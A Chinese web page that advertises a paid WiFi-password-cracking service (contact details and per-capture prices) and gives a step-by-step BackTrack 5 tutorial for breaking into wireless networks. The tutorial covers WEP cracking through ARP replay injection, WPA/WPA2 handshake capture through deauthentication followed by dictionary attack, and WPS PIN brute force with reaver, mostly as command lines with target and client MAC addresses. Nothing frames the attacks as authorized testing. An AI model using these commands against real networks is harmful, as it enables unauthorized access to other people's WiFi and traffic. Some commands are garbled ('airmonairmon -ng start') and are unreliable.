解决方案   News
    无分类
联系我们   Contact
搜索   Search
你的位置:首页 > 解决方案

使用BT5 R2对无线网的密钥进行破解的方法 (抓包/跑包/跑PIN)

2016/6/13 0:53:41      点击:


QQ:12065661   微信:Love1075621883    

专业wifi密码破解团队 跑握手包/cap跑包等一系列服务 普通15元一包,跑出再收费/淘宝/拍拍交易 

联系QQ:12065661  邮箱12065661@qq.com 淘宝店:http://shop116438515.taobao.com/

跑包规矩 

跑出密码不得以任何借口不付款



BT系列对于大部分人来说是很难学会的,它完全不同与windows系统,它是一个以doc(命令)界面为主,辅之以图形界面的。命令很多,接下来就简单的讲讲无线网破解的一些基本命令(软件都是内置好的),如果不习惯命令式操作,可以自己去网上找minidwep(最简单的一个无线破解软件)的deb文件。

通过vm虚拟机模拟(需要USB无线网卡,最好是8187或3070  https://shop116438515.taobao.com 我店上有,破解对wpa2信号要求很高) ,也可以通过U盘安装(需UNetbootin),直接通过BIOS设置进入即可,无需安装。(也可能不支持内置网卡,linux系统对PC的要求很变态,这点很像苹果系统)

 
  1. wep加密破解:
 
  ifconfig -a 查看所有的网卡
 
  ifconfig wlan0 up 激活无线网卡
 
  airmonairmon -ng start 设置无线网卡模式
 
  airodump-ng mon0 查看无线网络信息
 
  airodump-ng --ivs -w akast -c 6 mon0 抓包(-c是指频道,后面跟着我要破解的路由器的信号频道,也就是6)
 
  aireplay-ng -3 -b 00:21:27:63:41:CE -h 00:1F:3C:5F:36:15 mon0 ARP request 攻击 (-b后面跟着的是目标MAC地址。-h后面跟着的是本机的无线网卡MAC地址。)
 
  aircrack-ng akast*.ivs 开始破解
 
  2.wpa或wpa2破解(其实这两种加密方式并没有被完全破解,能破解运气占很大的成分)
 
  第一种是抓包后跑字典
 
  ifconfig -a 查看所有的网卡
 
  ifconfig wlan0 up 激活无线网卡
 
  airmonairmon -ng start 设置无线网卡模式
 
  airodump-ng mon0 查看无线网络信息
 
  airodump-ng -w akast -c 6 mon0 抓包
 
  aireplay-ng -0 1 -a 00:21:27:63:41:CE -c 00:1F:3C:5F:36:15 mon0 ARP request 攻击 (-a后面跟着的是目标MAC地址。-c后面跟着的是本机的无线网卡MAC地址。)
 
  aircrack-ng -w 密码字典akast*.cap 开始破解
 
  backtrack自带的密码列表:/pentest/wireless/aircrack-ng/lest/password.lst
 
  也可以在windows下用EWSA跑字典(利用CPU和GPU的,我电脑立马出现问题,不建议)
 
  第二种方法利用reaver进行pin解(也不是很可靠,拼人品的)
 
  ifconfig -a 查看所有的网卡
 
  ifconfig wlan0 up 激活无线网卡
 
  airmonairmon -ng start 设置无线网卡模式
 
  airodump-ng mon0 查看无线网络信息
 
  wash -i mon0 -C
 
  reaver -i mon0 -b MAC地址 -a -S -vv(如果出现timeout或者trying pin 12345670后不动了,可以重新试试)
 
  接下来说说其中有些英文表示的意思(不愿意看的直接略过)
 
  AP(无线网)
 
  BSSID——这个就是路由器的MAC地址了。
 
  PWR——这个是信号强度。
 
  Beacons——这个是路由器对外发包,可能是SSID广播。
 
  #Data——这个数据最最重要,这个代表可以用于破解的包,一般这个数据到达1W+,一般的64位的WEP密码就能够破解了。之后我们要做的,就是等待他到达1W,如果数据增长很缓慢(几分钟才增加1),那就只好用另一种方法了,就是发包攻击。
 
  #/s——DATA增加的速度。
 
  CH——频道,总共有11个频道,可以看到,我要破解的AP的频道是11。
 
  MB——无线的速度,现在一般都是54MB的了。
 
  CIPHER——加密方式。
 
  AUTH——这个应该是authorization的缩写,也就是授权的意思。
 

  ESSID——简单理解,这个就是路由器的名字了。


最好有客户端在线(即有人在使用中),不然没有Data,平添不少难度。(feedbottle似乎可以,不过伪连对于信号要求似乎很高,我的小USB网卡能伪连,却无法发送数据包